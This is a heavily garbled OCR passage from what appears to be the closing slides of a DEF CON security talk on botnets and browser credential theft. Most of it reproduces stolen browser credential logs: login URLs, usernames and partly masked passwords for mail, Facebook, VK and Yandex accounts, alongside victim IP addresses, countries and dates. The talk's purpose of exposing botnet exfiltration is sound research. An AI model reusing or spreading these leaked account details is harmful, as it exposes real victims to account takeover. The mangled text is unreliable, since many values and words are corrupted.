User of process: CL OUD2\Administrator 

Source : https : //auto- activation3 .kaspersky.cc^'en/acti vate 

https : / / au t □ - ac t i vat i □ n3 . kaspersky . com/ en/ activate 
Re f e re r : - ^^^^^^^^^^^^^^^^^^^^^^ 

POST data: 



REQUE5T_ID=-[| 
APP_ID=1^ 
ACT CODE=l 



|90e-53c3-43d3-4 9ceil675a42> 
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Demonstration 



This Data is Not Yours ! 





Mozilla Firef ox 

h-ttp : / / platf oma - pols 1 . pljggga s iiia 19 S3 : lizakl 
h-ttp : //o2. pl@@@krycha326 : liszka 

http : / /poczta - interia - pl@@@suiiiwwf@interia . pi : ^S^^S3*10 
http : / / platfbnna . pols 1 - pigggu s ern arae : a s iiia 19 S 9@@jp* pa s sword : liz a kl7 

Opera 

http : //poczt a .o2. pl/@krycha326<iBo2. pi : liszka 

https : //www.f acebook. com/login . n™fijjSjj|Ma326@5^^^^^Pszkaliszka 
h 1 1 p : / / poc zt a - j mwwi^^^^^^H . pi : rze s z ow2010 

h 1 1 p : / / o2 . pl/@p^^^^^HW3 - 90 : e n t e r 12 3 

++ IP Address: 187.12.65.226 | From: BR | ID: 3644C4ADE373E61EDB6B0D46F3250F397DAFFES6 | Date: 16.05. 2012 09:50:03 ++ 

Internet Explorer ^^^^^^^ 

http : //www. uol. con. br/@@@f e!( |i : 

h ttp : / /www . uol . | |Lic i a no 3m : 

++ IP Address: 93. S4. 42. 19 | From: BY | ID: &E7E3A7F2S19SD320374t23B4DD491FE3DC5D515 | Date: 16.05.2012 09:50:52 ++ 
Google Chrome 

http : / / vk . com/@g@mon opolia 2 : Re a 

http : / / passport .yandex. ru/@@@lady. lotisch :^^^^^^W^Wi 

windows HAS 

r :cg?n k PJ^^^^ 2 L,ei.b. All Browsers ! 

P a s wo - d : ^fl^PPS^^^' 

Phone : byf lay 

Login: ^ e 1 1 e 1 . b y UEP 
Password :| 
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Conclusion 

Botnets have become more robust and sophisticated 
Significant increase in exploitation of browsers 
HTTP has been used for data exfiltration 
Botnets die hard 



Questions 



■J 



Thanks 



DEF Con crew 



SecNiche Security Labs 




